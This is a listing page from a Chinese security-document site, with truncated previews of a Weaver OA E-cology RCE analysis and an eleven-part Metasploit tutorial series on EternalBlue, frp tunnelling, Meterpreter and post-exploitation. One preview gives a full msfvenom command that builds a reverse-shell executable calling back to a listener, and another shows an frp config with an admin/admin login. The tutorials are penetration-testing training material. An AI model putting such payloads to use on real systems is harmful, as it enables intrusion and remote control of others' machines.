爱豆文档 - 信息安全文档下载平台 - idocdown.com （部分文档，免费下载）

. . . . . .

泛微OA E-cology远程代码执行漏洞原理分析

# 泛微OA E-cology远程代码执行漏洞分析报告 ## 1. 漏洞概述 **漏洞名称**：泛微OA E-cology Beanshell接口远程代码执行漏洞 **CVE编号**：无 **CNVD编号**：CNVD-2019-32204 **影响版本**：e-cology <=9.0 **威胁等级**：高危 **公开时间**：2019年9月17日 ## 2. 漏洞背景泛微OA官方于2019年9月17日更新了一个远程代码执行漏洞补丁。该漏洞存在于泛微e-col

2025-08-16 11:06:09

Metasploit入门系列(一)——何为MSF

# Metasploit Framework (MSF) 入门教学文档 ## 1. Metasploit 简介 Metasploit 是一个免费的、可下载的框架，通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。 ### 1.1 设计初衷 - 最初设计为攻击工具开发平台 - 目前更多被用作现成的攻击环境 ### 1.2 版本类型 1. **Metasploit Framework** (Kali/Parrot Linux 自带版本)

2025-08-16 11:05:29

Metasploit入门系列(二)——初识模块

# Metasploit入门系列(二)——模块详解 ## 1. Metasploit框架架构概述 Metasploit框架(MSF)是一个强大的渗透测试平台，其架构由多个层次组成： ### 1.1 Rex功能库 - 不属于MSF核心部分 - 提供基础功能如HTTP/TELNET/SSH等连接功能 - 本质上是调用操作系统自带功能 ### 1.2 Core库 - MSF最底层的核心库 - 包含框架的基础功能： - 数据管理 - session管理 - 插件管理 ### 1.3

2025-08-16 11:05:04

Metasploit入门系列(三)——基本命令

# Metasploit 基本命令详解 ## 1. 帮助系统 Metasploit 提供了三种获取帮助的方式： - `?`：显示帮助，但需要手动输入完整命令（不支持tab补全） - `help`：显示帮助信息 - `-h`：命令后加-h参数获取帮助示例： ``` ? kill kill -h help kill ``` ## 2. 系统命令集成 Metasploit 控制台支持直接执行系统命令，无需切换窗口： - 支持tab补全等系统命令习惯 - 可以直接执行如`ls`、`ifcon

2025-08-16 11:04:26

Metasploit入门系列(四)——小结备查

# Metasploit入门系列(四)——命令详解与使用技巧 ## 核心命令详解 ### 基本操作命令 - `?` 或 `help`: 显示帮助菜单 - `banner`: 显示Metasploit标志性横幅 - `cd`: 更改当前工作目录 - `color`: 切换颜色显示 - `connect`: 与指定主机建立连接通信 - `exit`/`quit`: 退出控制台 - `history`: 显示命令历史记录 - `irb`: 进入交互式Ruby脚本模式 - `sleep`: 暂停指定

2025-08-16 10:53:48

Metasploit入门系列(五)——frp

# Metasploit与frp结合使用教程 ## 1. frp基础配置 ### 1.1 服务端配置(frps.ini) ```ini [common] bind_port = 7000 dashboard_port = 7500 dashboard_user = admin dashboard_pwd = admin ``` - `bind_port`: frp服务端监听端口，客户端连接使用 - `dashboard_port`: 仪表盘服务端口 - `dashboard_user`/

2025-08-16 10:52:57

Metasploit入门系列(六)——永恒之蓝

# Metasploit永恒之蓝(MS17-010)漏洞利用详解 ## 一、永恒之蓝漏洞概述永恒之蓝(MS17-010)是微软Windows操作系统SMB服务中的一个远程代码执行漏洞，于2017年3月被微软修补。该漏洞影响Windows 7、Windows Server 2008等多个版本的操作系统。 ## 二、环境准备 ### 1. 靶机要求 - Windows 7系统(未打2017年3月补丁) - 关闭防火墙或允许SMB流量 - 使用SMBv1协议 ### 2. 攻击机配置 ``

2025-08-16 10:52:30

Metasploit入门系列(七)——Armitage

# Armitage 使用指南：Metasploit 的图形化界面工具 ## 1. Armitage 简介 Armitage 是 Metasploit 框架的图形化用户界面(GUI)工具，旨在简化渗透测试过程。它是 msfgui 的替代品，具有以下特点： - 提供可视化操作界面，降低 Metasploit 使用门槛 - 支持"一键式"渗透测试功能 - 具备团队协作功能（客户端/服务器模式） - 跨平台支持（Linux/Windows/macOS） **注意**：由于 Metasploit

2025-08-16 10:51:48

Metasploit入门系列(八)——Meterpreter(一)

# Meterpreter入门与使用指南 ## 1. Meterpreter简介 Meterpreter是Metasploit框架中的一种高级、动态可扩展的payload，它运行在目标系统内存中，不需要在磁盘上写入任何文件。Meterpreter提供了丰富的功能，包括但不限于： - 系统信息收集 - 文件系统操作 - 屏幕截图 - 键盘记录 - 权限提升 - 摄像头控制 - 网络探测 ## 2. 环境准备 ### 2.1 操作系统建议 - **推荐使用Linux平台**：虽然Meta

2025-08-16 10:50:55

Metasploit入门系列(九)——Meterpreter(二)

# Meterpreter 命令详解与实战指南 ## 一、Meterpreter 核心概念 Meterpreter 是 Metasploit 框架中的一个高级、动态可扩展的有效载荷，它运行于内存中，不向硬盘写入任何内容，具有强大的后渗透功能。Meterpreter 采用模块化设计，支持多种操作系统平台，提供统一的命令接口，不受底层操作系统限制。 ## 二、核心命令 (Core Commands) ### 1. 会话管理命令 - `background`：将当前会话放入后台 - `ses

2025-08-16 10:50:14

Metasploit入门系列(十)——Meterpreter(三)

# Meterpreter高级使用指南（三） ## 木马生成篇 ### 两种木马生成方式对比 1. **官方推荐方式**： ```bash msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.1 LPORT=4444 -f exe -o payload.exe ``` - 这是最常用的生成方式 - 体积较小（约为第二种方式的1/3） - 路径封装在msfvenom命令内部，实际指向`/m

2025-08-16 10:48:58

Metasploit入门系列(十一)——后渗透测试

# Metasploit后渗透测试全面指南 ## 一、后渗透测试概念与PTES标准后渗透测试(Post Exploitation)是渗透测试执行标准(PTES)中的关键环节，其核心目的是： 1. 确定沦陷服务器的价值 2. 保持对机器的控制以供后续使用 PTES标准中后渗透测试的重要性： - 内容量几乎相当于其他六项标准之和 - 实际渗透测试中常被忽视的环节后渗透测试四大核心任务： 1. **提权**：获取更高权限 2. **信息收集**：识别敏感数据和配置 3. **渗透内网**：

2025-08-16 10:48:17

跳转到页